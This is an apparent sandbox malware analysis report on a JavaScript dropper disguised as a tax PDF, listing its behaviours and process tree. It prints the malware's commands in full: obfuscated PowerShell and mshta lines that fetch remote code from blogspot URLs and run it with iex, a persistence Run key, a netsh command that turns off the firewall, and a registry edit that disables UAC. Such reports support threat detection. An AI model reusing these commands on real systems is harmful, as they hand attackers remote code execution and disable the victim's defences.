e986916f17c8189d61aa80a487fdc9f056194358794400fedf218663e39c30cb

Analysis

max time kernel
150s
max time network
143s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
24/02/2024, 15:20

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

John_Smith_Tax_2023.pdf .js
Size

517KB
MD5

8d04824115da2813f54a55afaa983185
SHA1

e3b8d41d5866a857eeb4919da5ebf2d00bd940cb
SHA256

e986916f17c8189d61aa80a487fdc9f056194358794400fedf218663e39c30cb
SHA512

4ca05f9bfbdea291773755d2fe271ca1d3eb8e599628961f9ff9552884e17fe1c67d2296819ebe9056cba58f93f665eb2e0367fa44e4819272dbb7f854f36196
SSDEEP

384:KOdVq2k785UIro8KTMhSeYm5P2jiuuEjP+rS:rq2g85UIrofMzYy2jinEj2+

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	4764	powershell.exe
3	4764	powershell.exe
5	4764	powershell.exe
6	4764	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2876	netsh.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defienderz-scaner1 = "schtasks /run /tn Defienderz-scaner1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defiendeqr-scaner2 = "mshta \"javascript:cwse=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm capfeb-22-24.blogspot.com////////////////////atom.xml \| iex);Start-Sleep -Seconds 5;','run']; gcwt=[cwse[3],cwse[0],cwse[1],cwse[2]]; new ActiveXObject(gcwt[2])[gcwt[0]](gcwt[3], 0, true);close();new ActiveXObject(gcwt[1]).DeleteFile(WScript.ScriptFullName);\"\n"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	bitbucket.org
3	bitbucket.org

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org
4	ip-api.com
10	api.ipify.org

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4764 set thread context of 2120	4764	powershell.exe	91
PID 4764 set thread context of 912	4764	powershell.exe	93
PID 4764 set thread context of 4984	4764	powershell.exe	96

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 16 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	dw20.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4181651180-3163410697-3990547336-1000_Classes\Local Settings\MuiCache	AdobeCollabSync.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
2120	RegSvcs.exe
2120	RegSvcs.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	2120	RegSvcs.exe
Token: SeRestorePrivilege	2068	dw20.exe
Token: SeBackupPrivilege	2068	dw20.exe
Token: SeBackupPrivilege	2068	dw20.exe
Token: SeBackupPrivilege	2068	dw20.exe
Token: SeBackupPrivilege	4996	dw20.exe
Token: SeBackupPrivilege	4996	dw20.exe
Token: SeIncreaseQuotaPrivilege	4764	powershell.exe
Token: SeSecurityPrivilege	4764	powershell.exe
Token: SeTakeOwnershipPrivilege	4764	powershell.exe
Token: SeLoadDriverPrivilege	4764	powershell.exe
Token: SeSystemProfilePrivilege	4764	powershell.exe
Token: SeSystemtimePrivilege	4764	powershell.exe
Token: SeProfSingleProcessPrivilege	4764	powershell.exe
Token: SeIncBasePriorityPrivilege	4764	powershell.exe
Token: SeCreatePagefilePrivilege	4764	powershell.exe
Token: SeBackupPrivilege	4764	powershell.exe
Token: SeRestorePrivilege	4764	powershell.exe
Token: SeShutdownPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeSystemEnvironmentPrivilege	4764	powershell.exe
Token: SeRemoteShutdownPrivilege	4764	powershell.exe
Token: SeUndockPrivilege	4764	powershell.exe
Token: SeManageVolumePrivilege	4764	powershell.exe
Token: 33	4764	powershell.exe
Token: 34	4764	powershell.exe
Token: 35	4764	powershell.exe
Token: 36	4764	powershell.exe
Token: SeIncreaseQuotaPrivilege	4764	powershell.exe
Token: SeSecurityPrivilege	4764	powershell.exe
Token: SeTakeOwnershipPrivilege	4764	powershell.exe
Token: SeLoadDriverPrivilege	4764	powershell.exe
Token: SeSystemProfilePrivilege	4764	powershell.exe
Token: SeSystemtimePrivilege	4764	powershell.exe
Token: SeProfSingleProcessPrivilege	4764	powershell.exe
Token: SeIncBasePriorityPrivilege	4764	powershell.exe
Token: SeCreatePagefilePrivilege	4764	powershell.exe
Token: SeBackupPrivilege	4764	powershell.exe
Token: SeRestorePrivilege	4764	powershell.exe
Token: SeShutdownPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeSystemEnvironmentPrivilege	4764	powershell.exe
Token: SeRemoteShutdownPrivilege	4764	powershell.exe
Token: SeUndockPrivilege	4764	powershell.exe
Token: SeManageVolumePrivilege	4764	powershell.exe
Token: 33	4764	powershell.exe
Token: 34	4764	powershell.exe
Token: 35	4764	powershell.exe
Token: 36	4764	powershell.exe
Token: SeIncreaseQuotaPrivilege	4764	powershell.exe
Token: SeSecurityPrivilege	4764	powershell.exe
Token: SeTakeOwnershipPrivilege	4764	powershell.exe
Token: SeLoadDriverPrivilege	4764	powershell.exe
Token: SeSystemProfilePrivilege	4764	powershell.exe
Token: SeSystemtimePrivilege	4764	powershell.exe
Token: SeProfSingleProcessPrivilege	4764	powershell.exe
Token: SeIncBasePriorityPrivilege	4764	powershell.exe
Token: SeCreatePagefilePrivilege	4764	powershell.exe
Token: SeBackupPrivilege	4764	powershell.exe
Token: SeRestorePrivilege	4764	powershell.exe
Token: SeShutdownPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeSystemEnvironmentPrivilege	4764	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1108	AcroRd32.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe
1108	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4904 wrote to memory of 4764	4904	wscript.exe	79
PID 4904 wrote to memory of 4764	4904	wscript.exe	79
PID 4764 wrote to memory of 1108	4764	powershell.exe	83
PID 4764 wrote to memory of 1108	4764	powershell.exe	83
PID 4764 wrote to memory of 1108	4764	powershell.exe	83
PID 4764 wrote to memory of 552	4764	powershell.exe	84
PID 4764 wrote to memory of 552	4764	powershell.exe	84
PID 552 wrote to memory of 572	552	csc.exe	85
PID 552 wrote to memory of 572	552	csc.exe	85
PID 4764 wrote to memory of 2876	4764	powershell.exe	86
PID 4764 wrote to memory of 2876	4764	powershell.exe	86
PID 1108 wrote to memory of 792	1108	AcroRd32.exe	87
PID 1108 wrote to memory of 792	1108	AcroRd32.exe	87
PID 1108 wrote to memory of 792	1108	AcroRd32.exe	87
PID 792 wrote to memory of 1152	792	AdobeCollabSync.exe	88
PID 792 wrote to memory of 1152	792	AdobeCollabSync.exe	88
PID 792 wrote to memory of 1152	792	AdobeCollabSync.exe	88
PID 1152 wrote to memory of 224	1152	AdobeCollabSync.exe	89
PID 1152 wrote to memory of 224	1152	AdobeCollabSync.exe	89
PID 1152 wrote to memory of 224	1152	AdobeCollabSync.exe	89
PID 4764 wrote to memory of 2120	4764	powershell.exe	91
PID 4764 wrote to memory of 2120	4764	powershell.exe	91
PID 4764 wrote to memory of 2120	4764	powershell.exe	91
PID 4764 wrote to memory of 2120	4764	powershell.exe	91
PID 4764 wrote to memory of 2120	4764	powershell.exe	91
PID 4764 wrote to memory of 2120	4764	powershell.exe	91
PID 4764 wrote to memory of 2120	4764	powershell.exe	91
PID 4764 wrote to memory of 2120	4764	powershell.exe	91
PID 4764 wrote to memory of 912	4764	powershell.exe	93
PID 4764 wrote to memory of 912	4764	powershell.exe	93
PID 4764 wrote to memory of 912	4764	powershell.exe	93
PID 4764 wrote to memory of 912	4764	powershell.exe	93
PID 4764 wrote to memory of 912	4764	powershell.exe	93
PID 4764 wrote to memory of 912	4764	powershell.exe	93
PID 4764 wrote to memory of 912	4764	powershell.exe	93
PID 4764 wrote to memory of 912	4764	powershell.exe	93
PID 912 wrote to memory of 2068	912	RegSvcs.exe	94
PID 912 wrote to memory of 2068	912	RegSvcs.exe	94
PID 912 wrote to memory of 2068	912	RegSvcs.exe	94
PID 4764 wrote to memory of 4984	4764	powershell.exe	96
PID 4764 wrote to memory of 4984	4764	powershell.exe	96
PID 4764 wrote to memory of 4984	4764	powershell.exe	96
PID 4764 wrote to memory of 4984	4764	powershell.exe	96
PID 4764 wrote to memory of 4984	4764	powershell.exe	96
PID 4764 wrote to memory of 4984	4764	powershell.exe	96
PID 4764 wrote to memory of 4984	4764	powershell.exe	96
PID 4764 wrote to memory of 4984	4764	powershell.exe	96
PID 4984 wrote to memory of 4996	4984	Msbuild.exe	97
PID 4984 wrote to memory of 4996	4984	Msbuild.exe	97
PID 4984 wrote to memory of 4996	4984	Msbuild.exe	97
PID 1108 wrote to memory of 2796	1108	AcroRd32.exe	98
PID 1108 wrote to memory of 2796	1108	AcroRd32.exe	98
PID 1108 wrote to memory of 2796	1108	AcroRd32.exe	98
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99
PID 2796 wrote to memory of 3052	2796	RdrCEF.exe	99

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\John_Smith_Tax_2023.pdf .js
1⤵
- Suspicious use of WriteProcessMemory
PID:4904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm maincap2-22-24.blogspot.com/////////////////////////////////////////////////////////////atom.xml) | . ('i@*@x').replace('@*@','e');Start-Sleep -Seconds 3;
  2⤵
  - UAC bypass
  - Blocklisted process makes network request
  - Registers COM server for autorun
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4764
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\John_Smith_Tax_2023.pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1108
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe" -c
      4⤵
      Suspicious use of WriteProcessMemory
      PID:792
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe" -c --type=collab-renderer --proc=792
        5⤵
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:1152
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe" GetChannelUri
        6⤵
        
        PID:224
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2796
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A8DEF8591534970DF398989F995B30F0 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3052
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D816FB4B4D9F3B137A88F31B5FE0451A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D816FB4B4D9F3B137A88F31B5FE0451A --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:2476
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=5308F58AFB7EA68D884492B7154579B1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=5308F58AFB7EA68D884492B7154579B1 --renderer-client-id=4 --mojo-platform-channel-handle=2320 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:4696
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B0866384D3F1A373F8DD0D04D8D36F7E --mojo-platform-channel-handle=2456 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:4684
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=460F762A4D032B70D2FC1A2EF2C5E862 --mojo-platform-channel-handle=1992 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:652
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=20B12385A6CCDEB67FBB27DEC2FB9EBF --mojo-platform-channel-handle=2932 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:5020
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\atq5noat\atq5noat.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:552
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83D6.tmp" "c:\Users\Admin\AppData\Local\Temp\atq5noat\CSC83C325F13DA84E7B89C65FAAF4ECDE27.TMP"
      4⤵
      PID:572
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
    3⤵
    - Modifies Windows Firewall
    PID:2876
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:912
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 804
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
